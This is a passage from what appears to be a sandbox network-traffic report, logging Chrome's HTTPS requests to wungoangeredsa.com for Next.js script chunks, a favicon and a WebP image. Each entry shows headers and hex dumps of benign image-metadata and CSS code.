                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1058
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:25 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41777b911921-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:25 UTC391INData Raw: 31 38 30 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 33 36 32 33 5d 2c 7b 34 33 36 32 33 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 74 2c 65 29 7b 65 2e 72 28 74 29 2c 74 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 6d 5f 32 30 2e 36 32 62 30 34 37 63 34 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 6f 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 45 34 41 41 41 42 51 41 67
                                                                                                          Data Ascii: 180"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[43623],{43623:function(A,t,e){e.r(t),t.default={src:"/_next/static/media/m_20.62b047c4.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRloAAABXRUJQVlA4IE4AAABQAg
                                                                                                          2025-01-06 11:09:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          99192.168.2.450150104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC497OUTGET /_next/static/chunks/a61972911ad09d00-1736072686539.d5eb9d66276548f8.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:25 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:25 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-17a"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1058
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:25 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41779dd44384-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:25 UTC385INData Raw: 31 37 61 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 39 35 35 5d 2c 7b 31 39 35 35 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 65 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 6d 5f 32 38 2e 30 39 34 64 64 63 32 30 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 67 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 45 77 41 41 41 41 51 41 67 43 64
                                                                                                          Data Ascii: 17a"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1955],{1955:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_28.094ddc20.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlgAAABXRUJQVlA4IEwAAAAQAgCd
                                                                                                          2025-01-06 11:09:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          100192.168.2.450149104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC497OUTGET /_next/static/chunks/ffa1a9ad1af72fff-1736072686539.a773b898c1059c87.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:25 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:25 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-184"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1320
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:25 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41779a4c4398-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:25 UTC395INData Raw: 31 38 34 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 37 35 32 30 5d 2c 7b 33 37 35 32 30 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 65 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 6d 5f 31 33 2e 39 39 64 31 30 35 63 30 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 77 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 46 41 41 41 41 43 77 41 51
                                                                                                          Data Ascii: 184"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[37520],{37520:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_13.99d105c0.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlwAAABXRUJQVlA4IFAAAACwAQ
                                                                                                          2025-01-06 11:09:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          101192.168.2.450148104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:24 UTC497OUTGET /_next/static/chunks/edad189aa37887a4-1736072686539.43e4db17fc3b4987.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:25 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:25 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-180"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1320
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:25 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb417798729e05-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:25 UTC391INData Raw: 31 38 30 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 31 35 30 34 5d 2c 7b 31 31 35 30 34 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 65 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 6d 5f 34 35 2e 64 34 62 34 62 32 33 61 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 6f 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 45 34 41 41 41 41 51 41 67
                                                                                                          Data Ascii: 180"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[11504],{11504:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_45.d4b4b23a.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRloAAABXRUJQVlA4IE4AAAAQAg
                                                                                                          2025-01-06 11:09:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          102192.168.2.450153104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:25 UTC638OUTGET /_next/static/chunks/dc0be3deba0a9b89-1736072686539.5b2e1a67b76350ce.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:25 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:25 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-234"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1058
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:25 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4177af8cf797-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:25 UTC571INData Raw: 32 33 34 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 35 34 39 31 5d 2c 7b 39 35 34 39 31 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 72 29 7b 72 2e 72 28 65 29 3b 76 61 72 20 74 3d 72 28 39 32 32 32 38 29 2c 63 3d 72 28 39 33 38 38 38 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 76 61 72 20 6e 3d 28 30 2c 74 2e 5a 29 28 5b 22 5c 6e 20 20 70 6c 61 63 65 2d 73 65 6c 66 3a 20 63 65 6e 74 65 72 3b 5c 6e 20 20 68 65 69 67 68 74 3a 20 34 30 70 78 3b 5c 6e 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 5c 6e 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 33 30 30 70 78 3b 5c 6e 20 20 62 6f 72 64 65 72 2d
                                                                                                          Data Ascii: 234"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[95491],{95491:function(n,e,r){r.r(e);var t=r(92228),c=r(93888);function o(){var n=(0,t.Z)(["\n place-self: center;\n height: 40px;\n width: 100%;\n max-width: 300px;\n border-
                                                                                                          2025-01-06 11:09:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          103192.168.2.450154104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:25 UTC497OUTGET /_next/static/chunks/b79dd0dbaf68b5b4-1736072686539.3b548827f7eb8d6d.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:25 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:25 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-180"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1058
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:25 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb41781d0f3354-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:25 UTC391INData Raw: 31 38 30 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 38 34 34 30 5d 2c 7b 35 38 34 34 30 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 74 2c 65 29 7b 65 2e 72 28 74 29 2c 74 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 66 5f 31 34 2e 33 66 39 63 64 65 36 66 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 6f 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 45 34 41 41 41 44 77 41 51
                                                                                                          Data Ascii: 180"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[58440],{58440:function(A,t,e){e.r(t),t.default={src:"/_next/static/media/f_14.3f9cde6f.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRloAAABXRUJQVlA4IE4AAADwAQ
                                                                                                          2025-01-06 11:09:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          104192.168.2.450156104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:25 UTC497OUTGET /_next/static/chunks/778e9b206de35143-1736072686539.bfe7610401739abb.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:25 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:25 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-17c"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1058
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:25 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb417879333320-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:25 UTC387INData Raw: 31 37 63 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 31 31 38 32 5d 2c 7b 32 31 31 38 32 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 65 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 6d 5f 32 37 2e 33 34 65 36 33 35 37 36 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 59 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 45 6f 41 41 41 43 77 41 51
                                                                                                          Data Ascii: 17c"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[21182],{21182:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_27.34e63576.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlYAAABXRUJQVlA4IEoAAACwAQ
                                                                                                          2025-01-06 11:09:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          105192.168.2.450157104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:25 UTC639OUTGET /favicon.ico HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: image
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:25 UTC334INHTTP/1.1 204 No Content
                                                                                                          Date: Mon, 06 Jan 2025 11:09:25 GMT
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: MISS
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:25 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb417a2a404217-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          106192.168.2.450158104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:25 UTC665OUTGET /_next/static/media/m_20.62b047c4.webp HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: image
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:25 UTC498INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:25 GMT
                                                                                                          Content-Type: image/webp
                                                                                                          Content-Length: 13378
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: "677a5f14-3442"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 989
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:25 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Accept-Ranges: bytes
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb417a9b86184d-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:25 UTC871INData Raw: 52 49 46 46 3a 34 00 00 57 45 42 50 56 50 38 20 2e 34 00 00 90 33 01 9d 01 2a 00 02 00 02 3e 6d 2e 91 45 a4 22 a1 98 59 3e 2c 40 06 c4 b3 b7 16 7d 7f e4 e8 fe a5 fe df ec a7 96 ff 7e 2b 11 fc 0f 85 f8 40 fa 9b 7e 0f c1 68 56 66 16 3e b3 52 8f 01 c3 06 cc 6d 8f af 7c f8 fd b3 e4 9e b0 fe 4d fe 13 fd 2f 32 ce 23 fc df fb df f6 3f dd 9f f0 fc 4d 1e 23 fd fb fd 57 b8 1f f1 3f e6 7f e2 3f b7 fa 00 7f 66 ef e9 fe be a1 bf eb ff 81 ff d0 fe cf e6 2f fe 07 b5 bf a0 df f2 bf b2 fc 31 fe 84 7f d4 fe c7 e8 77 f8 87 50 07 f0 ef e0 bf f5 bf b3 fb 69 fd 37 fe 67 f7 1f ce 4e 93 ff e1 9f f7 ff b8 f1 00 7e 80 74 53 41 6b 6f a1 13 05 f9 37 fc f4 6a 8f df 7f f4 77 5d f7 fa 5b f5 eb d6 af c7 bf 5f ff b1 fd c3 a9 67 ea 9f bb fa fc 62 8f d5 3b 32 66 27 fc bf 23 7f 0b f1 bf f9
                                                                                                          Data Ascii: RIFF:4WEBPVP8 .43*>m.E"Y>,@}~+@~hVf>Rm|M/2#?M#W??f/1wPi7gN~tSAko7jw][_gb;2f'#
